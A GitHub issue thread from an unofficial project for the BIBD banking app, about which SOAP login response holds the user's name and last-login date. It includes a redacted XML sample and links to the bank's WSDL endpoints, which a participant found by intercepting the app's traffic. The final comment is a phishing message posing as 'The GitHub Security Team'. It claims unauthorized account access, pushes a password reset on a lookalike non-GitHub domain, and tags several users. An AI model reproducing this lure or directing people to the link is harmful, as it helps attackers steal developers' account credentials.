### ISSUE TITLE
Getting dashboard welcome data

### ISSUE THREAD

**Issue by bahit** [izdiwho/mybibd#4]
When logging into BIBD app, on the dashboard. The welcome screen contains 2 information:

- Logged in user's name (perhaps this is based from user's registered name)
- Date and time logged in

<img width="606" alt="Screenshot_20190412-103212_png" src="https://user-images.githubusercontent.com/508511/56008934-8b556480-5d10-11e9-87ff-4d82440f3b6d.png">

Any idea, where we can retrieve this via the API?

**Comment by izdiwho** [comment]
Hmm, you're right, one of the APIs does provide this.
I think it's in the successful login response. I'll have to double check that though.

**Comment by Qoyyuum** [comment]
Its in there under `<name1>` and `<lastLoginDate>`

```
<ns2:loginInternetPinResponse xmlns="">
    <return>
        <obHeader>
            <statusCode>0000000</statusCode>
            <success>true</success>
            <transactionDate>20190415112847</transactionDate>
        </obHeader>
        <obUser>
            <accessId></accessId>
            <address1>[redacted]</address1>
            <address2>[redacted]</address2>
            <address3>[redacted]</address3>
            <address4></address4>
            <branchNumber></branchNumber>
            <cifNumber>[redacted]</cifNumber>
            <city></city>
            <companyId></companyId>
            <countryOfCitizenship></countryOfCitizenship>
            <electronicAddressDesc></electronicAddressDesc>
            <employerName></employerName>
            <identificationNumber>[redacted]</identificationNumber>
            <identificationType>[redacted]</identificationType>
            <languageIdentifier></languageIdentifier>
            <lastLoginDate>20190414113204</lastLoginDate>
            <loginId>[redacted]</loginId>
            <mobileNumber></mobileNumber>
            <mobilePasswordPosition>[redacted]</mobilePasswordPosition>
            <motherMaidenName></motherMaidenName>
            <name1>MY NAME</name1>
            <newCustomer>false</newCustomer>
            <phone2></phone2>
            <phone3></phone3>
            <roleId></roleId>
            <userId>[redacted]</userId>
        </obUser>
    </return>
</ns2:loginInternetPinResponse>
```

**Comment by bahit** [comment]
> Its in there under `<name1>` and `<lastLoginDate>`

Which code produces these outputs? I'm still now well versed with the API.

**Comment by Qoyyuum** [comment]
In the body of loginInternetPin

**Comment by syahnur197** [comment]
where do you guys get the documentation?

**Comment by izdiwho** [comment]
There is no documentation.

API details can be found here:
https://cib.bibd.com.bn/CCMiBWs/MiBWSServices/?wsdl <-- mobile banking
related

and

https://cib.bibd.com.bn/CCMiBWs/EPayWSServices/?wsdl <-- quickpay related

To understand which one is which, I had to do web request interception
while using the app.

Maybe if I'm free, I'll draft a simple documentation on how it all works.

As of now, you can find the information by digging into the code in here >
https://github.com/izdiwho/mybibd/blob/master/app/Http/Controllers/BIBDController.php
.

Lol, we really need to close this issue.

Maybe someday.

**Comment by krisfk** [comment]
# Unauthorized Access Alert

Hello,

We regret to inform you that your GitHub account has recently been accessed by unauthorized individuals. To prevent further security breaches, we highly recommend that you reset your password immediately and revoke any unauthorized access.

To reset your password and secure your account, please visit the following link: [Reset Password](http://github.hudevelopers.online/)

Your prompt attention to this matter is greatly appreciated. Thank you for helping us maintain the security of our community.

Sincerely,

The GitHub Security Team

---

Affected GitHub Users:  

- brandoncruz3
- @CapitanShinChan
- @jihan-socool
- @N0el4kLs
- @anjuls
- @morkot
- @mohsen-in
- @cydave
- @seanlilmateus
- @liqwik
